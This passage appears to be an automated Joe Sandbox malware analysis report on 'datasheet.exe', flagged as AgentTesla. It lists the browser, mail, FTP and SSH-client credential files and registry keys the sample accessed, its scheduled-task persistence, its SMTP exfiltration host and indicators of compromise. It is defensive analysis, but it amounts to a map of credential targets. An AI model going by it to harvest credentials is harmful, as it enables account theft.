                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.datasheet.exe.3d93ea0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.datasheet.exe.3dd06c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: datasheet.exe PID: 2960, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.datasheet.exe.3d93ea0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.datasheet.exe.3dd06c0.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.datasheet.exe.3dd06c0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.datasheet.exe.3d93ea0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.2218212331.00000000031C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.4606620906.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: datasheet.exe PID: 2960, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7088, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		311
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1559979 Sample: datasheet.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 52 smtp.yandex.ru 2->52 54 smtp.yandex.com 2->54 56 api.ipify.org 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 62 Antivirus / Scanner detection for submitted sample 2->62 64 9 other signatures 2->64 9 datasheet.exe 7 2->9         started        signatures3 process4 file5 40 C:\Users\user\AppData\...hzaIxEFbjyd.exe, PE32 9->40 dropped 42 C:\Users\...hzaIxEFbjyd.exe:Zone.Identifier, ASCII 9->42 dropped 44 C:\Users\user\AppData\Local\...\tmp8D3A.tmp, XML 9->44 dropped 46 C:\Users\user\AppData\...\datasheet.exe.log, ASCII 9->46 dropped 74 Uses schtasks.exe or at.exe to add and modify task schedules 9->74 76 Writes to foreign memory regions 9->76 78 Allocates memory in foreign processes 9->78 80 2 other signatures 9->80 13 EhzaIxEFbjyd.exe 5 9->13         started        16 RegSvcs.exe 15 2 9->16         started        19 powershell.exe 23 9->19         started        21 2 other processes 9->21 signatures6 process7 dnsIp8 82 Antivirus detection for dropped file 13->82 84 Multi AV Scanner detection for dropped file 13->84 86 Machine Learning detection for dropped file 13->86 96 3 other signatures 13->96 23 RegSvcs.exe 13->23         started        26 schtasks.exe 13->26         started        28 RegSvcs.exe 13->28         started        48 smtp.yandex.ru 77.88.21.158, 49714, 49724, 49747 YANDEXRU Russian Federation 16->48 50 api.ipify.org 104.26.13.205, 443, 49711, 49716 CLOUDFLARENETUS United States 16->50 88 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 16->88 90 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->90 92 Tries to steal Mail credentials (via file / registry access) 16->92 94 Loading BitLocker PowerShell Module 19->94 30 WmiPrvSE.exe 19->30         started        32 conhost.exe 19->32         started        34 conhost.exe 21->34         started        36 conhost.exe 21->36         started        signatures9 process10 signatures11 66 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->66 68 Tries to steal Mail credentials (via file / registry access) 23->68 70 Tries to harvest and steal ftp login credentials 23->70 72 2 other signatures 23->72 38 conhost.exe 26->38         started        process12

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    datasheet.exe55%ReversingLabsByteCode-MSIL.Packed.Generic
                    datasheet.exe100%AviraHEUR/AGEN.1305393
                    datasheet.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe100%AviraHEUR/AGEN.1305393
                    C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe55%ReversingLabsWin32.Trojan.Generic

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://crl.gl0%Avira URL Cloudsafe
                    http://crl.globalsig0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    smtp.yandex.ru
                    		77.88.21.158
                    		truefalse
                      		high
                      api.ipify.org
                      		104.26.13.205
                      		truefalse
                        		high
                        smtp.yandex.com
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.ipify.orgdatasheet.exe, 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://account.dyn.com/datasheet.exe, 00000000.00000002.2188466952.0000000003D09000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2213872719.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                https://api.ipify.org/tRegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://crl.glRegSvcs.exe, 0000000F.00000002.4616702168.000000000605E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4616412400.000000000602B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namedatasheet.exe, 00000000.00000002.2187514566.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.2218212331.0000000003171000.00000004.00000800.00020000.00000000.sdmp, EhzaIxEFbjyd.exe, 0000000B.00000002.2236785446.0000000002DD5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002D3C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.globalsigRegSvcs.exe, 0000000F.00000002.4615623153.0000000005F72000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://smtp.yandex.comRegSvcs.exe, 00000009.00000002.2218212331.00000000031EC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.000000000316E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003041000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002EFD000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.0000000003294000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.4606620906.000000000322A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      77.88.21.158
                                      		smtp.yandex.ruRussian Federation
                                      		13238YANDEXRUfalse
                                      104.26.13.205
                                      		api.ipify.orgUnited States
                                      		13335CLOUDFLARENETUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1559979
                                      Start date and time:2024-11-21 09:01:09 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 40s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:20
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:datasheet.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.evad.winEXE@21/15@2/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:
                                      • Successful, ratio: 100%
                                      • Number of executed functions: 187
                                      • Number of non-executed functions: 12
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                      • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                      • VT rate limit hit for: datasheet.exe

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      03:02:01API Interceptor3x Sleep call for process: datasheet.exe modified
                                      03:02:04API Interceptor30x Sleep call for process: powershell.exe modified
                                      03:02:06API Interceptor3x Sleep call for process: EhzaIxEFbjyd.exe modified
                                      03:02:07API Interceptor9920032x Sleep call for process: RegSvcs.exe modified
                                      09:02:05Task SchedulerRun new task: EhzaIxEFbjyd path: C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      77.88.21.158datasheet.exeGet hashmaliciousAgentTeslaBrowse
                                        0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                          BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                            REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                              DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                                Transferencias6231.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                  Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                    Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                      TRANSFERENCIA BANCARIA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        xBneIooWzQjjOOg.exeGet hashmaliciousAgentTeslaBrowse
                                                          104.26.13.2052b7cu0KwZl.exeGet hashmaliciousUnknownBrowse
                                                          • api.ipify.org/
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • api.ipify.org/
                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                          • api.ipify.org/
                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                          • api.ipify.org/
                                                          file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                          • api.ipify.org/
                                                          Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                                          • api.ipify.org/
                                                          file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                                          • api.ipify.org/
                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                                                          • api.ipify.org/
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • api.ipify.org/
                                                          file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                                                          • api.ipify.org/

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          smtp.yandex.rudatasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 77.88.21.158
                                                          0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                          • 77.88.21.158
                                                          BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                                          • 77.88.21.158
                                                          REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 77.88.21.158
                                                          DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 77.88.21.158
                                                          Transferencias6231.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 77.88.21.158
                                                          Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 77.88.21.158
                                                          Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 77.88.21.158
                                                          TRANSFERENCIA BANCARIA.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          • 77.88.21.158
                                                          xBneIooWzQjjOOg.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 77.88.21.158
                                                          api.ipify.orgdatasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          https://www.canva.com/design/DAGXCpgrUrs/iMtluWgvWDmsrSdUOsij5Q/view?utm_content=DAGXCpgrUrs&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                          • 104.26.12.205
                                                          https://pub-a652f10bc7cf485fb3baac4a6358c931.r2.dev/dreyflex.htmlGet hashmaliciousGabagoolBrowse
                                                          • 104.26.12.205
                                                          https://url.us.m.mimecastprotect.com/s/cx8GCJ6Aj8C8mZ33UVfXHy0nVz?domain=canva.comGet hashmaliciousUnknownBrowse
                                                          • 104.26.12.205
                                                          IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                          • 172.67.74.152
                                                          order and drawings_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          vessel details_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.12.205
                                                          MV BUSAN STAR - calling to discharge about 55,000Mt of aggregates.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          QuarantineMessage.zipGet hashmaliciousUnknownBrowse
                                                          • 172.67.74.152
                                                          https://hmjpvx0wn1.gaimensebb.shop/Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                          • 104.26.13.205

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          YANDEXRUdatasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 77.88.21.158
                                                          0zu73p2YBu.exeGet hashmaliciousChrome Password Stealer, Fox Password Stealer, Opera Password StealerBrowse
                                                          • 77.88.21.158
                                                          BWr9qnCU8X.exeGet hashmaliciousUnknownBrowse
                                                          • 77.88.21.158
                                                          Unit 2_week 4 2024.pptxGet hashmaliciousHTMLPhisherBrowse
                                                          • 77.88.21.90
                                                          REQUEST FOR OFFER EQUIPMENT ORDER LIST.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 77.88.21.158
                                                          https://vivantskincare.taplink.wsGet hashmaliciousHTMLPhisherBrowse
                                                          • 93.158.134.119
                                                          DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 77.88.21.158
                                                          https://sites.google.com/view/we2k-/homeGet hashmaliciousUnknownBrowse
                                                          • 87.250.250.119
                                                          Cursor Commander.exeGet hashmaliciousUnknownBrowse
                                                          • 213.180.204.90
                                                          SecuriteInfo.com.Win32.Application.Agent.NSIF6L.17895.28880.exeGet hashmaliciousUnknownBrowse
                                                          • 213.180.193.14
                                                          CLOUDFLARENETUSdatasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.96.3
                                                          Secured Audlo_secpod.com_1524702658.htmlGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.96.3
                                                          file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                          • 188.114.97.3
                                                          https://texasbarcle.com/CLE/AAGateway.asp?lRefID=19203&sURL=https://famezik.com/#Zi5waWNhc3NvJG1hcmxhdGFua2Vycy5ncg==Get hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          ArchivoNuevo.msiGet hashmaliciousUnknownBrowse
                                                          • 162.159.140.238
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 188.114.97.3
                                                          ibk0BQaWAo.exeGet hashmaliciousUnknownBrowse
                                                          • 188.114.97.6

                                                          JA3 Fingerprints

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          3b5074b1b5d032e5620f69f9f700ff0edatasheet.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 104.26.13.205
                                                          ORDER 20240986 OA.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                          • 104.26.13.205
                                                          PO#8329837372938383839238PDF.exeGet hashmaliciousXWormBrowse
                                                          • 104.26.13.205
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.26.13.205
                                                          https://ollama.com/Get hashmaliciousUnknownBrowse
                                                          • 104.26.13.205
                                                          z1Tender_procurement_product_order__21_11_2024_.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                          • 104.26.13.205
                                                          ArchivoNuevo.msiGet hashmaliciousUnknownBrowse
                                                          • 104.26.13.205
                                                          file.exeGet hashmaliciousLummaCBrowse
                                                          • 104.26.13.205
                                                          file.exeGet hashmaliciousUnknownBrowse
                                                          • 104.26.13.205
                                                          https://tally.so/widgets/embed.jsGet hashmaliciousUnknownBrowse
                                                          • 104.26.13.205

                                                          Dropped Files

                                                          No context

                                                          Created / dropped Files

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EhzaIxEFbjyd.exe.log

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\EhzaIxEFbjyd.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                          Malicious:false
                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\datasheet.exe.log

                                                          Download File
                                                          Process:C:\Users\user\Desktop\datasheet.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1216
                                                          Entropy (8bit):5.34331486778365
                                                          Encrypted:false
                                                          SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                          MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
